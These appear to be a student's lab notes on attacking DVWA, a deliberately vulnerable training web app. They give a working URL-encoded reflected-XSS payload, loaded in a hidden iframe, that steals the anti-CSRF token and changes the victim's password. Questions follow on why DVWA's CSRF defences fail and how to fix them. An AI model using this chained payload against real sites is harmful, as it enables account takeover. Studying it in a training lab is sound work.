simon-staal/security_2022_labs/tutorial_9/notes.md

 <iframe src="http://10.6.66.42/dvwa/vulnerabilities/xss_r/?name=%3Ciframe+id%3D%22csrf_vuln%22+src%3D%22http%3A%2F%2F10.6.66.42%2Fdvwa%2Fvulnerabilities%2Fcsrf%2F%22+style%3D%22visibility%3A+hidden%3B%22+onload%3D%22var+iframe+%3D+document.getElementById(%27csrf_vuln%27)%3B%0A+var+doc+%3D+iframe.contentWindow.document%3B+var+token+%3D+doc.getElementsByName(%27user_token%27)%5B0%5D.value%3B+const+http+%3D+new+XMLHttpRequest()%3B+const+url+%3D+%27http%3A%2F%2F10.6.66.42%2Fdvwa%2Fvulnerabilities%2Fcsrf%2F%3Fpassword_new%3Dhigh%26password_conf%3Dhigh%26Change%3DChange%26user_token%3D%27%2Btoken%3B+http.open(%27GET%27%2C+url)%3B+http.send()%3B%22%3E%3C%2Fiframe%3E", style="visibility: hidden;">
 </iframe>
 ```
 Another option is to redirect our user to the payload url using a `<meta>` tag in the header, but this means that the user can see that they've been redirected, which might be a little *sus*.
 If we now open our [evil webpage](high.html), all the relevent network requests are made, with our XXS attack triggering a CSRF attack which sets the user's password to 'high'!

+## Questions
+1. In the *easy* difficulty, there is no attempt to prevent CSRF.
+The attempts to prevent if in the other levels are on line 5:
+  - *Medium level:* The faulty if-statement was covered in it's section.
+However, if it worked as intended it could still easily be bypassed (e.g. with the use of an iframe).
+Furthermore, the server name could appear anywhere in the referring url, and doesn't even need to be the origin to bypass the filter.
+  - *High level:* The anti-CSRF token is static and per-user, allowing it to be stolen (using another exploit in DVWA) and reused in a CSRF exploit at any later time.

+2. These vulnerabilites could be solved with the correct implementation of an anti-CSRF token, or requiring the user to correctly supply some authenticating information (e.g. their current password) before performing the password change.